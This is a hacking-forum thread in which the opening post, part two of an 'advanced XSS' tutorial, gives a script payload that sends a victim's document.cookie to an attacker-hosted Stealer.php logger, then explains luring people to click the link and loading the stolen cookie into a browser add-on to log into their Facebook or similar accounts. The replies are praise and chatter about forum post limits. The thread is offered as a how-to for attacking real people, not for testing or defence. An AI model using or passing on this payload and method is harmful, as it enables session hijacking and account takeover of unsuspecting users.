Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


Advanced XSS Tutorial [PART 2] filter_list
Author
Message
Advanced XSS Tutorial [PART 2] #1
ADVANCED XSS PART 2

Here comes the real stuff. Now you're going to exploit the vulnerability with the PHP script, if you have found a persistant XSS this will be a piece of cake, if not (which is probablly is) you'll have to send the link to everyone you want to get the cookies from.

1. Now, go to your vulnerable site and enter the following where it's vulnerable:

Code:
<script>location.href = 'http://www.Yoursite.3owl.com/Stealer.php?cookie='+document.cookie;</script>

2. Send the link to the one you want the cookies from (Usually if you find a vulnerability in a big service, for example Google or Youtube, everyone will click the link because everyone trusts Youtube and Google, right?), now when they have clicked the link you can head back to your "log.txt" and you'll see the victims IP, Port Number, Host, User Agent and ofcourse, their cookie.

Now, when we have the cookie, what are we supposed to do with it?
- Well, i'll show you!


Download the "Cookies Manager" addon for your browser and you can edit your cookies with the excisting cookies. If you would find this on facebook for example, edit the cookies and refresh the page and BAM, you're logged in into your victims Facebook account.

Reply

RE: Advanced XSS Tutorial [PART 2] #2
looks good... but was it really necessary to split it up? there is very little additional information in this thread would have been fine as one tutorial.

Reply

RE: Advanced XSS Tutorial [PART 2] #3
(09-28-2013, 02:39 PM)Geoff Wrote: looks good... but was it really necessary to split it up? there is very little additional information in this thread would have been fine as one tutorial.

Yeah, HackCommunity only allows a specific amount of characters in peoples posts.

Reply

RE: Advanced XSS Tutorial [PART 2] #4
(09-28-2013, 03:03 PM)Zedex Wrote:
(09-28-2013, 02:39 PM)Geoff Wrote: looks good... but was it really necessary to split it up? there is very little additional information in this thread would have been fine as one tutorial.

Yeah, HackCommunity only allows a specific amount of characters in peoples posts.

Oh really... i wasnt aware of that haha. my apologies... carry on. lol

Reply

RE: Advanced XSS Tutorial [PART 2] #5
(09-28-2013, 03:22 PM)Geoff Wrote:
(09-28-2013, 03:03 PM)Zedex Wrote:
(09-28-2013, 02:39 PM)Geoff Wrote: looks good... but was it really necessary to split it up? there is very little additional information in this thread would have been fine as one tutorial.

Yeah, HackCommunity only allows a specific amount of characters in peoples posts.

Oh really... i wasnt aware of that haha. my apologies... carry on. lol

Haha! No problem :Smile:

Reply

RE: Advanced XSS Tutorial [PART 2] #6
keep it up pro Smile

Reply

RE: Advanced XSS Tutorial [PART 2] #7
(09-28-2013, 03:27 PM)EgyptGhost Wrote: keep it up pro Smile

Thanks! :Smile:

Reply

RE: Advanced XSS Tutorial [PART 2] #8
(09-28-2013, 03:22 PM)Geoff Wrote:
(09-28-2013, 03:03 PM)Zedex Wrote:
(09-28-2013, 02:39 PM)Geoff Wrote: looks good... but was it really necessary to split it up? there is very little additional information in this thread would have been fine as one tutorial.

Yeah, HackCommunity only allows a specific amount of characters in peoples posts.

Oh really... i wasnt aware of that haha. my apologies... carry on. lol

This should actually be brought up to the attention of Bluedog.

And @Zedex i hope to see more HQ threads out of you. Smile

Reply

RE: Advanced XSS Tutorial [PART 2] #9
(09-28-2013, 03:22 PM)Geoff Wrote:
(09-28-2013, 03:03 PM)Zedex Wrote:
(09-28-2013, 02:39 PM)Geoff Wrote: looks good... but was it really necessary to split it up? there is very little additional information in this thread would have been fine as one tutorial.

Yeah, HackCommunity only allows a specific amount of characters in peoples posts.

Oh really... i wasnt aware of that haha. my apologies... carry on. lol

This should actually be brought up to the attention of Bluedog.

And @Zedex i hope to see more HQ threads out of you. Smile

Reply

RE: Advanced XSS Tutorial [PART 2] #10
(09-28-2013, 03:22 PM)Geoff Wrote:
(09-28-2013, 03:03 PM)Zedex Wrote:
(09-28-2013, 02:39 PM)Geoff Wrote: looks good... but was it really necessary to split it up? there is very little additional information in this thread would have been fine as one tutorial.

Yeah, HackCommunity only allows a specific amount of characters in peoples posts.

Oh really... i wasnt aware of that haha. my apologies... carry on. lol

This should actually be brought up to the attention of Bluedog.

And @Zedex i hope to see more HQ threads out of you. Smile

Reply